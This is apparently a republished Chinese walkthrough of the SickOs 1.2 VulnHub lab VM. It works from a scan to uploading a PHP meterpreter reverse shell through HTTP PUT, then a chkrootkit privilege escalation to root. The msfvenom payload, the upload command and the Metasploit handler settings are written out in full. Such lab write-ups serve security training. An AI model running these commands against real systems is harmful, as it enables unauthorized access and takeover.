OSCP难度靶机之SickOs 1.2

admin 2022年5月4日12:31:23评论62 views字数 1034阅读3分26秒阅读模式

虚拟机信息

虚拟机下载地址:https://www.vulnhub.com/entry/sickos-12,144/

虚拟机简介:这是 SickOs 后续系列中的第二个,独立于之前的版本,挑战范围是获得系统的最高权限。

目标:1个flag

级别:中级

1、主机探测

1、通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之SickOs 1.2

2、服务探测

1、通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.137

查看开放20、80端口

OSCP难度靶机之SickOs 1.2

3、渗透测试

3.1 HTTP渗透

1.访问站点信息如下

访问80端口页面未发现有用信息,同时查看网页源代码未发现有用信息

OSCP难度靶机之SickOs 1.2

2.目录扫描测试

dirb http://192.168.207.137

发现有一个test目录

OSCP难度靶机之SickOs 1.2

3.测试站点其他项

curl -v -X OPTIONS http://192.168.207.137/test

支持PUT和MOVE选项

OSCP难度靶机之SickOs 1.2

4.创建反弹shell连接

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.207.130 lport=443 -f raw

OSCP难度靶机之SickOs 1.2

5.上传反弹shell文件

nmap -p80 192.168.207.137 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'

OSCP难度靶机之SickOs 1.2

6.开启MSF监听

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.207.130
set lport 443
run

访问站点获取到反弹shell连接

OSCP难度靶机之SickOs 1.2

3.2 主机渗透

1.获取主机信息

shell
python -c 'import pty; pty.spawn("/bin/bash")'

OSCP难度靶机之SickOs 1.2

2.查看计划任务

ls -la /etc/cron*

OSCP难度靶机之SickOs 1.2

查看版本

chkrootkit -V

OSCP难度靶机之SickOs 1.2

3.查看漏洞利用方法

searchsploit chkrootkit

OSCP难度靶机之SickOs 1.2

4.利用MSF进行利用

use exploit/unix/local/chkrootkit
set session 1
set lport 8080
run

已经获取到root权限

OSCP难度靶机之SickOs 1.2

5.查看flag信息

cd /root
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt

OSCP难度靶机之SickOs 1.2


原文始发于微信公众号(安全孺子牛):OSCP难度靶机之SickOs 1.2

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月4日12:31:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之SickOs 1.2http://cn-sec.com/archives/971625.html

发表评论

匿名网友 填写信息